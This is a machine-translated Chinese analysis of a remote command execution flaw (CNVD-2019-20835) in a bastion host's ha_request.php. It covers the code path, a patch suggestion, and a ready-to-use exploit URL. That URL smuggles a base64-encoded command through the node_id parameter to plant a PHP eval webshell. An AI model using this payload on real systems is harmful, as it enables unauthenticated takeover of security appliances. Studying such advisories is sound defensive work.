Qi rule fortress machine Remote Command Execution Vulnerability (CNVD-2019-20835) analysis

First, the basic information

　　Vulnerability Announcement: https://www.cnvd.org.cn/flaw/show/1632201

　　Patch Information: fixes the vulnerability is published, if the customer has not repaired the patch, you can contact technical support Qi treatment technology to get specific help.

Second, the source code analysis

　　Ha_request.php variable problem occurs in file, function Exec first row 37, $ url is user controllable, visible lines 33 and 34. Eyes, line 23 to 24 and, as long as the function return value node_request "OK", fatal to skip function (this function is a custom function similar to the role of the exit function built PHP), continue down.

　　Defined in the function Node_request include / common.php file, see Figure 2. According to its original logic function is $ URL request, and returns it. The code logic, $ url =. "Http: // $ req_ipaddr" "/listener/$method.php?n=$req_node_id&a=" .urlencode (json_encode ($ args)) ;. So $ url variable values similar to http://10.20.10.11/listener/cluster_manage.php?n=1&a=%5B%22install%22%5D such strings.

　　But the $ req_ipaddr and $ req_node_id are from user input. Therefore, if the hacker 10.20.10.11 controllable server, content listener / cluster_manage.php file is "<php ​​echo 'OK';?>", Can be such that node_request function returns "OK", thereby skipping fatal function, continue down to the exec function.

　　Back exec function, then the first parameter is a function, "wget ​​--no-check-certificate http://10.20.10.11 /ha_get_install.php?n=$req_node_id -O backup_scripts.tar.bz2 "so we can only put $ req_node_id the payload variable.

　　See Figure 3, $ req_ipaddr and $ req_node_id actually comes from the $ _REQUEST [ 'ipaddr'] and $ _REQUEST [node_id '], and do a global filter, delete some dangerous characters.

figure 1

figure 2

image 3

Third, exploit

　　Conditions of use: Can not log in

　　Use process:

　　First, http://10.20.10.11/listener/cluster_manage.php return "OK".

　　Second, perform the following link getshell, after successful execution, saying the horse /var/www/shterm/resources/qrcode/lbj77.php generate PHP code 10086. It is assumed that the IP address 10.20.10.10 fortress machine.

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}-d|bash`|${IFS}|echo${IFS}

Fourth, the reference and repair suggestions

1, suggested fix

　　$ Node_id look should be an integer, so just at the beginning of ha_request.php file, add the following line of code, the variable filter can be.

　　$node_id = @intval($req_node_id);

2、参考

　　https://www.php.net/manual/en/function.exec.php

　　https://www.anquanke.com/post/id/84920